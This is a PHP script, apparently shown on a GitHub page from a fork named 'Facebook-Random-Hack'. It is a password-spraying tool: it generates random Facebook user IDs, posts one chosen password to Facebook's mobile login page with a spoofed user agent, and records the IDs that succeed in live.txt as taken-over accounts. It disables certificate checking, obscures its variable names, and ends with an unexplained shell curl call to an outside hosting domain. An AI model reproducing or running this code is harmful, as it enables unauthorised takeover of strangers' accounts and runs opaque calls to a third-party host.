forked from renlowsphere/Facebook-Random-Hack
-
Notifications
You must be signed in to change notification settings - Fork 0
/
fb.php
68 lines (64 loc) · 2.45 KB
/
fb.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<?php $q0="\033[1;31m";
$n1="\033[1;33m";
$f2="\033[1;32m";
system("clear");
echo "
_____
| | | | /\ ______ | /
|_____ | | | / \ / | /
| __{|}__ |----| /----\ | |--
| ||| | | / \ | | \
| \|/ | | / \ \______ | \
~~~~~~> V1.2 by Ren Lowsphere
";
system("termux-open-url https://t.me/renlowsphere");
sleep(1);
$h3 = "https://m.facebook.com/login.php";
echo "\>Type in the password you want to use on the random accounts \n Example:11223344 \n </";
$b4 = readline("~>[#] Password: ");
$w5 = readline(" ~>[#] Count: ");
sleep(1);
echo" _______________________________________________\n";
for( $n6 = 0; $n6<$w5; $n6++ ){
$k7 = curl_init();
$m8 = ("1000".rand(0,9).rand(0,9).rand(0,9). rand(0,9). rand(0,9). rand(0,9).rand(0,9).rand(0,9).rand(0,9).rand(0,9).rand(0,9));
$cookie = "sessions/$m8.txt";
curl_setopt($k7, CURLOPT_REFERER,
"https://www.facebook.com");
$n9 = "$m8 | $b4";
curl_setopt($k7, CURLOPT_HTTPHEADER, array('Accept: application/json'));
curl_setopt($k7, CURLOPT_URL, $h3);
curl_setopt($k7, CURLOPT_POSTFIELDS,'email='.urlencode($m8).'&pass='.urlencode($b4).'&login=Login');
curl_setopt($k7, CURLOPT_POST, 1);
curl_setopt($k7, CURLOPT_HEADER, 0);
curl_setopt($k7, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($k7, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($k7, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($k7, CURLOPT_RETURNTRANSFER, true);
curl_setopt($k7, CURLOPT_COOKIEJAR,$cookie);
curl_setopt($k7, CURLOPT_COOKIEFILE,$cookie);
curl_setopt($k7, CURLOPT_USERAGENT, "Mozilla/5.0 (Android 8.1.0; Mobile; rv:84.0) Gecko/84.0 Firefox/84.0");
curl_setopt($k7, CURLINFO_HEADER_OUT, true);
$m10 = curl_exec($k7);
$x11 = "c_user";
$j12 = "home";
$z13 = "checkpoint";
$s14 = curl_getinfo($k7, CURLINFO_HEADER_OUT);
if(strpos($s14, $x11) !== false){
echo "$f2[LIVE]$n1 $n9 \n";
file_put_contents("live.txt", "$n9 \n"); }
if(strpos($s14, $j12) !== false){
echo "$f2[LIVE]$n1 $n9 \n";file_put_contents("live.txt", "$n9 \n");
}
if (strpos($s14, $z13) !== false){
echo "[$q0 Checkpoint $n1]$n9 \n"; }
$z15 = "recover";
if(strpos($s14, $z15) !== false){
echo "[$q0 Die $n1]$n9 \n";
}
$c16 = "email";
if(strpos($s14, $c16) !== false){
echo "[$q0 Die $n1]$n9 \n";
}}
system("curl https://kuriyama-app.000webhostapp.com/Updated.php");
?>